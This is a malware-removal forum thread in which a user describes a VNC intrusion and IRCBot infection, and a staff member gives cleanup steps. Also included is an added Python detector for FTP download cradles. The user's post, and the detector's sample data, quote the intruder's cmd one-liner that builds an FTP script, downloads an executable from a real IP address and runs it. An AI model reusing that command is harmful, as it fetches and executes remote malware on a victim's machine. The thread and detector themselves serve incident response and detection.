Win32.IRCBot.wo/oagain.exe/dragonage.exe, am I clean?

Discussion in 'Malware Help (A Specialist Will Reply)' started by Muppen, Sep 26, 2006.

  1. Muppen

    Muppen Private E-2

    I read the "READ & RUN ME FIRST Before Asking for Support".

    Don't know how much background info you guys need along with the log files so I include the details if you need them (and sorry if I don't get all the technical terms all right, I'm running my OS in Swedish and could have screwed up the translations). If all this is unnecessary, here's the condensed version: I got hacked via VNC and infected with some nasty shit that pretty much took over my cpu.

    Longer version: Apparently I have caught some newer virus via my VNC. It started with the oagain.exe all of a sudden showing as just downloaded in the Firefox "Downloads" menu, along with an empty Firefox tab. The file's origin was h*tp://www.w32-gen.us/ (changed a 't' to a '*' there, don't know if it's safe to go there, but it seemed to be some kind of cracking-site). I soon found out how this had happened, as "Run" popped up a couple of times during the evening with the file location pre-typed in, and immediately going off before I could do anything. As far as I know the file never ran itself though, which probably explains the multiple downloads.

    I googled the file name and found some information on another message board. I followed the instructions there to prevent my cpu from contacting the w.32-site again (along with other sites), and thought I was safe. Although I had some problems when starting up my cpu (MSN, firefox etc wouldn't start running when I clicked on them) I didn't pay that much attention to it since it often worked if I just restarted the whole thing.

    This Sunday the "Run"-window all of a sudden appeared with the file-destination pre-typed again, but whatever I had done to prevent my cpu from contacting that site apparently worked, and instead of the file downloading there was just a "Problem loading page"-message in a new Firefox-tab. However, the Command-window suddenly appeared and closed again (it happened too fast for me to see what it read) and then "Run" opened again. This time there was no text pre-written as before; instead I could see the text being typed in as if it was me typing. I quickly pressed cancel* and then noticed the VNC-icon being active. I tried to close it down, but before I could move my mouse cursor to confirm, cancel was more or less auto-pressed. I tried again a couple of times with no success and finally used the arrow keys along with enter to make it go faster than whatever was controlling my cpu. When I had shut VNC down I quickly as hell uninstalled it, and thought I at least was safe for the moment.

    *Here's what was typed before I canceled the action:
    cmd /c echo OPEN 81.231.173.176 21200>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit

    I started running Adaware, but it didn't find anything. Spybot, Anti-Vir and Norton didn't even start at all. I did find (manually) "New.net Domains 7.22" which I uninstalled.

    I also tried to go to the other message board to get some more information, but as soon as I clicked the link (from Google) Firefox shut down. I did find some other information though, and made a search for HijackThis. This time I didn't even get to the link from Google, as Firefox immediately shut down as soon as the search was finished. Pretty soon I couldn't access the internet at all.

    I tried to go into the directory where the program was installed to start Norton from there, but as soon as I clicked the "Norton Internet Security"-directory the window shut down. I successfully uninstalled Spybot and Anti-Vir with the intention of reinstalling them; however, Norton wouldn't uninstall, although it did disappear from the "Add/Remove programs"-menu.

    Next thing I did was to install the F-Secure software (antivirus/firewall), but the virus apparently took that one over as well as soon as it was installed.

    Finally, I rebooted in safe mode, reinstalled F-Secure and got it up and running and updated. I made a full scan (unfortunately no log attached since only the last scan seems to be saved, and I just did another one (bummer, attaching that one though)) and found some less serious crap, along with the "Win32.IRCBot.wo"-file that seems to be the real bad guy in this whole mess. After that I found my way to majorgeeks and started the process in the "READ & RUN ME FIRST Before Asking for Support"-section.

    However, during the process, F-Secure found (and removed) "Win32.IRCBot.wo" one more time, and a similar virus a couple of times. There is also the "Dragonage.exe - Bioware - Unknown - Stopped" showing, checked, among the startup files. So am I really clean?

    I also wonder if there is some way to completely uninstall Norton. I cleaned out the directory manually since it wasn't in "Add/Remove" and didn't seem to feature an "Uninstall"-option elsewhere, but apparently it isn't all gone since I get some kind of error message from the program every now and then.

    Sorry for the long post...

    *more attachments coming*
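As an added defender's illustration (not part of the thread), here is a small detector for the pattern that was typed into the Run box above: an FTP script assembled with echo, fed to FTP -s:, and the fetched file launched in the same one-liner. The sample command lines are constructed for this example; the first is the line quoted in the post.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample of process command lines: the first is the line from the
# Run box in the post above, the other two are benign look-alikes.
SAMPLE_COMMAND_LINES = [
    "cmd /c echo OPEN 81.231.173.176 21200>x&echo GET 84785_redworld2.exe>>x"
    "&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit",
    "ftp -n -s:upload.txt ftp.example.com",   # scripted ftp from a pre-existing file
    "cmd /c dir C:\\Users > listing.txt",
]

ECHO_RE = re.compile(r"^echo\s+(.*?)\s*>{1,2}\s*(\S+)$", re.I)   # echo TEXT > file
FTP_RE = re.compile(r"^ftp(?:\.exe)?\b.*?-s:(\S+)", re.I)         # ftp ... -s:file

@dataclass
class FtpCradle:
    script_file: str
    host: str = ""
    port: str = "21"
    fetched: list[str] = field(default_factory=list)
    executed: list[str] = field(default_factory=list)

def analyze_ftp_cradle(cmdline: str) -> FtpCradle | None:
    """Flag a command line that builds an ftp script with echo, runs ftp -s: on it,
    and launches what it fetched. Returns None when that pattern is absent."""
    body = re.sub(r"^\S*cmd(?:\.exe)?\s+/[ck]\s+", "", cmdline.strip(), flags=re.I)
    steps = [s.strip() for s in re.split(r"\s*&&?\s*", body) if s.strip()]
    ftp = next((FTP_RE.match(s) for s in steps if FTP_RE.match(s)), None)
    if ftp is None:
        return None
    script = ftp.group(1)
    # Only echo redirections that target the very file ftp -s: reads count.
    lines = [m.group(1) for s in steps
             if (m := ECHO_RE.match(s)) and m.group(2).lower() == script.lower()]
    if not lines:
        return None      # ftp -s: on a file not built inline: not the cradle pattern
    finding = FtpCradle(script_file=script)
    for line in lines:
        tokens = line.split()
        verb = tokens[0].upper()
        if verb == "OPEN" and len(tokens) >= 2:
            finding.host = tokens[1]
            if len(tokens) >= 3:
                finding.port = tokens[2]
        elif verb in ("GET", "RECV", "MGET") and len(tokens) >= 2:
            finding.fetched.append(tokens[-1])      # local filename is the last token
    fetched_lower = {f.lower() for f in finding.fetched}
    for s in steps:      # a step that simply names a fetched file runs it
        first = re.sub(r"^start\s+", "", s, flags=re.I).split()[0]
        if first.lower() in fetched_lower:
            finding.executed.append(first)
    return finding

def find_ftp_cradles(cmdlines):
    """Run the check over many command lines and return (cmdline, finding) hits."""
    return [(c, f) for c in cmdlines if (f := analyze_ftp_cradle(c))]
```

The same logic applies to a process-creation log field (for example the command line recorded by a process auditing tool), one record at a time.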

  2. Muppen

    Muppen Private E-2

    More attachments.

    The F-Secure log wasn't in a text format, but apart from some trash in the Spybot recovery directory (and apart from the files found in earlier scans, which I can't find anywhere) these are the only interesting things:

    Code:
    Unscanned files:
    
        * Couldn't open C:\pagefile.sys
        * Couldn't open C:\WINDOWS\system32\drivers\dtscsi.sys
        * Couldn't open C:\WINDOWS\system32\drivers\sptd.sys
        * Couldn't open C:\WINDOWS\system32\config\default
        * Couldn't open C:\Documents and Settings\******\Local settings\Temp\hsperfdata_******\3920
    This kind of worries me since it seems that those folders are where some other trash has been hidden as well.

  3. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Welcome to Majorgeeks!

    According to the logs you attached, you still have Symantec/Norton installed. Or did you attach some logs from before you took all these steps that you were mentioning? I need logs that reflect the actual current state of your system, and you must not do anything except what I request that you do from this point on. It was a bad idea to install all that F-Secure stuff while Symantec was still installed, and it was a bad idea to install it period because it is going to be a huge resource hog. Looks like you got it for free from your ISP, but it is still going to make your PC run very slow. We'll deal with that later. Also note that line where you mentioned
    was due to F-secure dialing back to your ISP!

    So please run the below:

    Norton Removal Tool (SymNRT)


    Then do the following!

    Click on Start, then Run ... type services.msc into the box that opens up, and press 'OK'. On the page that opens, scroll down to Local Policies ... then right click the entry, select 'Properties' and press 'Stop Service'. When it shows that it is stopped, next please set the 'Start-up Type' to 'Disabled'. Press 'OK' until you get back to Windows.

    Now repeat the above stop and disable for the following services:
    Remote Administrator Service
    Dragon Age - Bioware

    Next, run HJT, but instead of scanning, click on the "None of the above, just start the program" button at the bottom of the choices. At the lower right, click on the 'Config' button, and then the 'Misc Tools' button ... select 'Delete an NT Service' ... copy/paste the following into the box that opens, and press 'OK':

    ntbpol

    Now repeat the Delete NT Service steps for:
    r_server
    Dragon Age - Bioware

    If you receive any error messages just ignore them and continue.

    Now exit HJT and reboot when it tells you it needs to.

    After reboot attach the below new logs:
    • GetRunKey
    • ShowNew
    • HijackThis
     
  4. Muppen

    Muppen Private E-2

    I very much appreciate your help! However, I ended up reinstalling Windows XP completely instead, so I have to apologize for taking up your time. Even so, this website helped me tremendously with all its guides and information, thanks guys!

    (Weird thing that happened just prior to the re-installation though: All of a sudden CPU went up to 100% and it seemed it was audio.exe taking up most of it. I tried to shut it down, but it came right back on again. I also tried to right-click on the icon in the bottom right and two options popped up, Volume control and one other, but none was clickable. Then when I held my mouse cursor over the icon there was an IP-nr. showing... WTF?? I pulled the plug and later reinstalled XP from scratch. It was also impossible to transfer files (I was trying to rescue the pics from our camera before reinstalling) to another cpu via cable, and with no burner installed I ended up using a 0.5 USB-memory for transferring 4GB of files, took me quite a while actually... :))

    Anyway, I have F-Secure installed now, but am thinking about switching to Zone Alarm + AVG because of the recommendations here. How much difference does it really make?
     
  5. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Everyone has different PC specs, but from what I have seen in about 10 cases, the effect of F-Secure's security suite is dramatic. Every security suite thus far (Symantec, McAfee, F-Secure, etc) has been a killer to PC performance. Using separate tools (like in the below link) is normally less of a problem.

    You should check out the below:

    How to Protect yourself from malware!
     
  6. Muppen

    Muppen Private E-2

    Ok, thank you very much for your help!
     
  7. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    You're welcome. Surf safely!
     